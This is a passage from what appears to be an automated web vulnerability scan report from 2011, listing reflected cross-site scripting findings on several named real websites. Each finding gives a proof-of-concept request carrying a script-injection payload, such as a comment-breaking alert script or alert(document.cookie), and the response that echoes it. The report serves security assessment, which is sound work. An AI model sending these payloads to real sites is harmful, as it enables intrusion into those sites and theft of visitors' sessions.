Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/registrars/index.html?a1f04--><script>alert(1)</script>16711f55bfb=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:23 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 52786

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Registrar Directory</title>
<meta
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/registrars/index.html?a1f04--><script>alert(1)</script>16711f55bfb=1 -->
...[SNIP]...

3.101. http://www.isp-planet.com/services/trouble_ticket/chart.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/trouble_ticket/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b81da--><script>alert(1)</script>798b74c10cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/trouble_ticket/chart.html?b81da--><script>alert(1)</script>798b74c10cf=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:43 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:43 GMT
Connection: close
Content-Type: text/html
Content-Length: 64949

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Trouble Ticketing Systems Quick R
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/trouble_ticket/chart.html?b81da--><script>alert(1)</script>798b74c10cf=1 -->
...[SNIP]...

3.102. http://www.isp-planet.com/services/trouble_ticket/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/trouble_ticket/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a7a2c--><script>alert(1)</script>70392a62872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/trouble_ticket/index.html?a7a2c--><script>alert(1)</script>70392a62872=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:42 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:42 GMT
Connection: close
Content-Type: text/html
Content-Length: 49484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Trouble Ticketing Systems Directo
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/trouble_ticket/index.html?a7a2c--><script>alert(1)</script>70392a62872=1 -->
...[SNIP]...

3.103. http://www.isp-planet.com/services/voip_wholesalers/chart.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/voip_wholesalers/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5d4d0--><script>alert(1)</script>fb8d8fcf9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/voip_wholesalers/chart.html?5d4d0--><script>alert(1)</script>fb8d8fcf9c=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:45 GMT
Connection: close
Content-Type: text/html
Content-Length: 85300

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - VoIP Wholesale Provider Quick Reference Chart</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldm
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/voip_wholesalers/chart.html?5d4d0--><script>alert(1)</script>fb8d8fcf9c=1 -->
...[SNIP]...

3.104. http://www.isp-planet.com/services/voip_wholesalers/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/voip_wholesalers/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2777d--><script>alert(1)</script>a0764eaf025 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/voip_wholesalers/index.html?2777d--><script>alert(1)</script>a0764eaf025=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:45 GMT
Connection: close
Content-Type: text/html
Content-Length: 50503

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - VoIP Wholesale Provider Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldman">
<meta
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/voip_wholesalers/index.html?2777d--><script>alert(1)</script>a0764eaf025=1 -->
...[SNIP]...

3.105. http://www.isp-planet.com/services/webmail/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/webmail/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c270e--><script>alert(1)</script>95e5514ff52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/webmail/index.html?c270e--><script>alert(1)</script>95e5514ff52=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:43 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:43 GMT
Connection: close
Content-Type: text/html
Content-Length: 52664

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Webmail Directory</title>
<m
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/webmail/index.html?c270e--><script>alert(1)</script>95e5514ff52=1 -->
...[SNIP]...

3.106. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.liverpoolonlinedegrees.co.uk
Path:   /2x/prequal.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60daf"><script>alert(1)</script>16c9b78682c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2x/prequal.jsp?60daf"><script>alert(1)</script>16c9b78682c=1 HTTP/1.1
Host: www.liverpoolonlinedegrees.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP="ALL DSP COR CURa ADMa DEVa PSAa OUR BUS PHY ONL UNI COM NAV DEM STA PRE"
Cache-Control: public
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 15:01:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=N-jN3kyh3uilQ9ki86RTyA**.app2-all2; Path=/
Set-Cookie: CLK=0#1298041265948; Expires=Sat, 16-Feb-2019 15:01:05 GMT; Path=/
Set-Cookie: CLK=0#1298041265948; Expires=Sat, 16-Feb-2019 15:01:05 GMT; Path=/
Content-Length: 32995

<!-- Copyright Quinstreet Inc., 2011 -->
<html>
<head>
<title> University of Liverpool</title>
<link rel="stylesheet" href="Style.css" type="text/css"/>
<script language="JavaScript" type="text/javasc
...[SNIP]...
<Input Name="LeadSiteURL" Value="http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp?60daf"><script>alert(1)</script>16c9b78682c=1" Type="hidden" tabIndex="19"/>
...[SNIP]...

3.107. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af71b"><script>alert(1)</script>c827934797a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /outsourcing-dot-net-development-contact-us.html?af71b"><script>alert(1)</script>c827934797a=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee3021d3c780=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:23:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 9326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<form id="contactus" method="post" action="/outsourcing-dot-net-development-contact-us.html?af71b"><script>alert(1)</script>c827934797a=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

3.108. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3906b"><script>alert(1)</script>e3021d3c780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss-cross-site-scripting.html?3906b"><script>alert(1)</script>e3021d3c780=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:58:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81; path=/
Connection: close
Content-Type: text/html
Content-Length: 18193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
<form id="contactus" method="post" action="/xss-cross-site-scripting.html?3906b"><script>alert(1)</script>e3021d3c780=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

3.109. http://www.palmblvd.com/ [e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.palmblvd.com
Path:   /

Issue detail

The value of the e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f request parameter is copied into an HTML comment. The payload 838ab--><script>alert(1)</script>8aeba5f5436 was submitted in the e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1838ab--><script>alert(1)</script>8aeba5f5436 HTTP/1.1
Host: www.palmblvd.com
Proxy-Connection: keep-alive
Referer: http://www.palmblvd.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1; qsg=14508

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:22:27 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:23:27 GMT
Content-Type: text/html
Content-Length: 70947

<HTML>
<HEAD>
<TITLE>Palm Boulevard: Newsletters</TITLE>
<META name="resource-type" content="document">
<META name="distribution" content="global">
<META NAME="date" CONTENT="">
<META NAME="
...[SNIP]...
<!-- marketplace01: Missing QUAD ads for page_type: other on path www.palmblvd.com with position A1
url: /?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1838ab--><script>alert(1)</script>8aeba5f5436 -->
...[SNIP]...

3.110. http://www.palmblvd.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.palmblvd.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e9235--><script>alert(1)</script>627b6f7c09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?e9235--><script>alert(1)</script>627b6f7c09f=1 HTTP/1.1
Host: www.palmblvd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:57:48 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:58:48 GMT
Connection: close
Content-Type: text/html
Content-Length: 70187

<HTML>
<HEAD>
<TITLE>Palm Boulevard: Newsletters</TITLE>
<META name="resource-type" content="document">
<META name="distribution" content="global">
<META NAME="date" CONTENT="">
<META NAME="
...[SNIP]...
<!-- marketplace01: Missing QUAD ads for page_type: other on path www.palmblvd.com with position A1
url: /?e9235--><script>alert(1)</script>627b6f7c09f=1 -->
...[SNIP]...

3.111. http://www.pdastreet.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pdastreet.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 79bf7--><script>alert(1)</script>338075590f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?79bf7--><script>alert(1)</script>338075590f4=1 HTTP/1.1
Host: www.pdastreet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:59:32 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:00:32 GMT
Connection: close
Content-Type: text/html
Content-Length: 69345

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>PDAStreet - The PDA Network for Handheld Computers, PDA Software, Windows CE, Pocket PC, Palm Pilot, Psion, iPaq, Pocket PC 2002,
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.pdastreet.com with position V
url: /?79bf7--><script>alert(1)</script>338075590f4=1 -->
...[SNIP]...

3.112. http://www.phpbuilder.com/ [7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The value of the 7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865 request parameter is copied into an HTML comment. The payload 4ebfc--><script>alert(1)</script>0eb00a3c424 was submitted in the 7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=14ebfc--><script>alert(1)</script>0eb00a3c424 HTTP/1.1
Host: www.phpbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.phpbuilder.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1; qsg=14508

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:20:54 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:21:54 GMT
Content-Type: text/html
Content-Length: 72352


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.phpbuilder.com with position T
url: /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=14ebfc--><script>alert(1)</script>0eb00a3c424 -->
...[SNIP]...

3.113. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7640d--><script>alert(1)</script>eb4ef76d865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?7640d--><script>alert(1)</script>eb4ef76d865=1 HTTP/1.1
Host: www.phpbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:57:36 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:58:36 GMT
Connection: close
Content-Type: text/html
Content-Length: 72210


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.phpbuilder.com with position T
url: /?7640d--><script>alert(1)</script>eb4ef76d865=1 -->
...[SNIP]...

3.114. http://www.phpbuilder.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4afe8--><script>alert(1)</script>959f959b02d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico4afe8--><script>alert(1)</script>959f959b02d HTTP/1.1
Host: www.phpbuilder.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 15:20:29 GMT
Server: Apache
Content-Type: text/html
Content-Length: 43228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.phpbuilder.com with position T
url: /favicon.ico4afe8--><script>alert(1)</script>959f959b02d -->
...[SNIP]...

3.115. http://www.phpbuilder.com/welcomead/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /welcomead/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload fb26c--><script>alert(1)</script>a4e106c783c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

